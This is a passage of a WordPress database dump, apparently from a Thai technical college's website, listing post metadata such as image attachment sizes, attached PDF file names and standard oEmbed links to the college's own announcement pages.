(26734, 10788, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/161163-08.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"161163-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"161163-08-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"161163-08-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"161163-08-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"161163-08-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26735, 10789, '_wp_attached_file', '2020/11/161163-07.jpg'),
(26736, 10789, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/161163-07.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"161163-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"161163-07-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"161163-07-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"161163-07-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"161163-07-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26737, 10790, '_wp_attached_file', '2020/11/161163-06.jpg'),
(26738, 10790, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/161163-06.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"161163-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"161163-06-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"161163-06-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"161163-06-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"161163-06-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26739, 10791, '_wp_attached_file', '2020/11/161163-05.jpg'),
(26740, 10791, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/161163-05.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"161163-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"161163-05-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"161163-05-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"161163-05-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"161163-05-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26741, 10792, '_wp_attached_file', '2020/11/161163-04.jpg'),
(26742, 10792, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/161163-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"161163-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"161163-04-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"161163-04-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"161163-04-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"161163-04-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26743, 10793, '_wp_attached_file', '2020/11/161163-03.jpg'),
(26744, 10793, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/161163-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"161163-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"161163-03-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"161163-03-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"161163-03-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"161163-03-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26745, 10794, '_wp_attached_file', '2020/11/161163-02.jpg'),
(26746, 10794, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/161163-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"161163-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"161163-02-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"161163-02-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"161163-02-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"161163-02-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26747, 10795, '_wp_attached_file', '2020/11/161163-01.jpg'),
(26748, 10795, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/161163-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"161163-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"161163-01-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"161163-01-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"161163-01-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"161163-01-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26749, 10787, '_thumbnail_id', '10795'),
(26752, 10787, '_hide_featured', NULL),
(26757, 10797, '_edit_lock', '1605495822:14'),
(26758, 10797, '_edit_last', '14'),
(26759, 10797, '_thumbnail_id', '10794'),
(26762, 10797, '_hide_featured', NULL),
(26767, 10799, '_edit_lock', '1605495858:14'),
(26768, 10799, '_edit_last', '14'),
(26769, 10799, '_thumbnail_id', '10793'),
(26772, 10799, '_hide_featured', NULL),
(26777, 10801, '_edit_lock', '1605495889:14'),
(26778, 10801, '_edit_last', '14'),
(26779, 10801, '_thumbnail_id', '10792'),
(26782, 10801, '_hide_featured', NULL),
(26785, 10803, '_edit_lock', '1605495922:14'),
(26786, 10803, '_edit_last', '14'),
(26787, 10803, '_thumbnail_id', '10791'),
(26790, 10803, '_hide_featured', NULL),
(26793, 10805, '_edit_lock', '1605495957:14'),
(26794, 10805, '_edit_last', '14'),
(26795, 10805, '_thumbnail_id', '10790'),
(26798, 10805, '_hide_featured', NULL),
(26801, 10807, '_edit_lock', '1605496011:14'),
(26802, 10807, '_edit_last', '14'),
(26803, 10807, '_thumbnail_id', '10789'),
(26806, 10807, '_hide_featured', NULL),
(26811, 10809, '_edit_lock', '1605515098:14'),
(26812, 10809, '_edit_last', '14'),
(26813, 10809, '_thumbnail_id', '10788');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(26816, 10809, '_hide_featured', NULL),
(26823, 10811, '_edit_lock', '1605518868:14'),
(26824, 10811, '_edit_last', '14'),
(26825, 10812, '_wp_attached_file', '2020/11/20201116155938128.pdf'),
(26828, 10811, '_hide_featured', NULL),
(26831, 10814, '_edit_lock', '1605604845:14'),
(26832, 10814, '_edit_last', '14'),
(26833, 10815, '_wp_attached_file', '2020/11/รูปเล่มแผนปฏิบัติกราชการ-ประจำปีงบประมาณ-.pdf'),
(26834, 10816, '_wp_attached_file', '2020/11/ประกาศรายชื่อสอบครูจ้าง.pdf'),
(26837, 10814, '_hide_featured', NULL),
(26840, 10818, '_edit_lock', '1605604946:14'),
(26841, 10818, '_edit_last', '14'),
(26842, 10819, '_wp_attached_file', '2020/11/รูปเล่มแผนปฏิบัติกราชการ-ประจำปีงบประมาณ-1-1.pdf'),
(26843, 10818, '_hide_featured', NULL),
(26844, 10825, '_wp_attached_file', '2020/11/0001.jpg'),
(26845, 10825, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3509;s:6:\"height\";i:2481;s:4:\"file\";s:16:\"2020/11/0001.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"0001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"0001-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"0001-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"0001-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:16:\"0001-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26846, 10828, '_edit_lock', '1606218068:14'),
(26847, 10828, '_edit_last', '14'),
(26848, 10829, '_wp_attached_file', '2020/11/20201124140452555.pdf'),
(26851, 10828, '_hide_featured', NULL),
(26854, 10831, '_edit_lock', '1606354454:14'),
(26855, 10832, '_wp_attached_file', '2020/11/202011171600.pdf'),
(26856, 10833, '_wp_attached_file', '2020/11/202011171558.pdf'),
(26857, 10834, '_wp_attached_file', '2020/11/202011171557.pdf'),
(26858, 10835, '_wp_attached_file', '2020/11/202011171552.pdf'),
(26859, 10836, '_wp_attached_file', '2020/11/202011171305.pdf'),
(26860, 10831, '_edit_last', '14'),
(26861, 10831, '_hide_featured', NULL),
(26862, 10838, '_edit_lock', '1606355619:14'),
(26863, 10838, '_edit_last', '14'),
(26864, 10838, '_hide_featured', NULL),
(26865, 10843, '_edit_lock', '1606354713:14'),
(26866, 10843, '_edit_last', '14'),
(26867, 10843, '_hide_featured', NULL),
(26868, 10838, '_oembed_72d83f5d5871ff5b8d47cfb41df6200b', '<blockquote class=\"wp-embedded-content\" data-secret=\"OaljRKwDro\"><a href=\"http://www.technicrayong.ac.th/%e0%b8%84%e0%b8%b3%e0%b8%aa%e0%b8%b1%e0%b9%88%e0%b8%87-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3-3/\">คำสั่ง วิทยาลัยเทคนิคระยอง ที่ ๐๖๒๓/๒๕๖๑ เรื่อง แต่งตั้งคณะกรรมการดำเนินงานประกันคุณภาพภายในสถานศึกษา ปีการศึกษา ๒๕๖๐</a></blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"http://www.technicrayong.ac.th/%e0%b8%84%e0%b8%b3%e0%b8%aa%e0%b8%b1%e0%b9%88%e0%b8%87-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3-3/embed/#?secret=OaljRKwDro\" data-secret=\"OaljRKwDro\" width=\"600\" height=\"338\" title=\"“คำสั่ง วิทยาลัยเทคนิคระยอง ที่ ๐๖๒๓/๒๕๖๑ เรื่อง แต่งตั้งคณะกรรมการดำเนินงานประกันคุณภาพภายในสถานศึกษา ปีการศึกษา ๒๕๖๐” — วิทยาลัยเทคนิคระยอง\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>'),
(26869, 10838, '_oembed_time_72d83f5d5871ff5b8d47cfb41df6200b', '1606354894'),
(26870, 10846, '_edit_lock', '1606355113:14'),
(26871, 10846, '_edit_last', '14'),
(26872, 10846, '_hide_featured', NULL),
(26873, 10838, '_oembed_73ba260970c45221b04f8bf588734c56', '<blockquote class=\"wp-embedded-content\" data-secret=\"2n3Y54qkvV\"><a href=\"http://www.technicrayong.ac.th/%e0%b8%84%e0%b8%b3%e0%b8%aa%e0%b8%b1%e0%b9%88%e0%b8%87-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3-4/\">คำสั่ง วิทยาลัยเทคนิคระยอง ที่ ๐๖๑๙/๒๕๖๒ เรื่อง แต่งตั้งคณะกรรมการดำเนินงานประกันคุณภาพภายในสถานศึกษา ปีการศึกษา ๒๕๖๑</a></blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"http://www.technicrayong.ac.th/%e0%b8%84%e0%b8%b3%e0%b8%aa%e0%b8%b1%e0%b9%88%e0%b8%87-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3-4/embed/#?secret=2n3Y54qkvV\" data-secret=\"2n3Y54qkvV\" width=\"600\" height=\"338\" title=\"“คำสั่ง วิทยาลัยเทคนิคระยอง ที่ ๐๖๑๙/๒๕๖๒ เรื่อง แต่งตั้งคณะกรรมการดำเนินงานประกันคุณภาพภายในสถานศึกษา ปีการศึกษา ๒๕๖๑” — วิทยาลัยเทคนิคระยอง\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>'),
(26874, 10838, '_oembed_time_73ba260970c45221b04f8bf588734c56', '1606355156'),
(26875, 10849, '_edit_lock', '1606355122:14'),
(26876, 10849, '_edit_last', '14'),
(26877, 10849, '_hide_featured', NULL),
(26878, 10838, '_oembed_5985418ceb537206e1bf62f03c97c2a3', '<blockquote class=\"wp-embedded-content\" data-secret=\"E9OwKaq8Nd\"><a href=\"http://www.technicrayong.ac.th/%e0%b8%84%e0%b8%b3%e0%b8%aa%e0%b8%b1%e0%b9%88%e0%b8%87-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3-5/\">คำสั่ง วิทยาลัยเทคนิคระยอง ที่ ๐๑๓๒/๒๕๖๓ เรื่อง แต่งตั้งคณะกรรมการดำเนินงานประกันคุณภาพภายในสถานศึกษา ปีการศึกษา ๒๕๖๒</a></blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"http://www.technicrayong.ac.th/%e0%b8%84%e0%b8%b3%e0%b8%aa%e0%b8%b1%e0%b9%88%e0%b8%87-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3-5/embed/#?secret=E9OwKaq8Nd\" data-secret=\"E9OwKaq8Nd\" width=\"600\" height=\"338\" title=\"“คำสั่ง วิทยาลัยเทคนิคระยอง ที่ ๐๑๓๒/๒๕๖๓ เรื่อง แต่งตั้งคณะกรรมการดำเนินงานประกันคุณภาพภายในสถานศึกษา ปีการศึกษา ๒๕๖๒” — วิทยาลัยเทคนิคระยอง\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>'),
(26879, 10838, '_oembed_time_5985418ceb537206e1bf62f03c97c2a3', '1606355282'),
(26880, 10851, '_edit_lock', '1606355516:14'),
(26881, 10851, '_edit_last', '14'),
(26882, 10851, '_hide_featured', NULL),
(26883, 10855, '_wp_attached_file', '2020/11/Untitled-5.jpg'),
(26884, 10855, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:900;s:6:\"height\";i:1350;s:4:\"file\";s:22:\"2020/11/Untitled-5.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-5-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Untitled-5-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-5-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-5-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26885, 10856, '_wp_attached_file', '2020/11/หัวหน้าประกัน.jpg'),
(26886, 10856, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:900;s:6:\"height\";i:1500;s:4:\"file\";s:51:\"2020/11/หัวหน้าประกัน.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:51:\"หัวหน้าประกัน-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:51:\"หัวหน้าประกัน-180x300.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:52:\"หัวหน้าประกัน-768x1280.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:52:\"หัวหน้าประกัน-614x1024.jpg\";s:5:\"width\";i:614;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:51:\"หัวหน้าประกัน-180x300.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26887, 10858, '_edit_lock', '1606359253:14'),
(26888, 10858, '_edit_last', '14'),
(26889, 10859, '_wp_attached_file', '2020/11/261163-04.jpg'),
